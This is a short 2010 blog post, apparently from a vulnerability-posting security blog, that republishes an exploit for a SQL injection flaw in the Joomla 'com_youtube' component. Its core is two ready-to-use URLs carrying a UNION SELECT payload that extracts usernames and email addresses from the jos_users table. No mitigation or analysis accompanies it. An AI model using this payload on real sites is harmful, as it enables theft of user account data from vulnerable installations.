Sunday, July 25, 2010

Joomla [com_youtube] Sql Injection Vulnerability

0

# Exploit Title: Joomla "com_youtube" Sql Injection Vulnerability
# Date: 2010-07-24
# Tested on: windows-xp-sp2-fr : windows-xp-sp3-fr
----------------------------------------------------------------------------------------------------
===[ Exploit ]===
http://www.site.com/index.php?option=com_youtube&id_cate=4

union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
or
http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting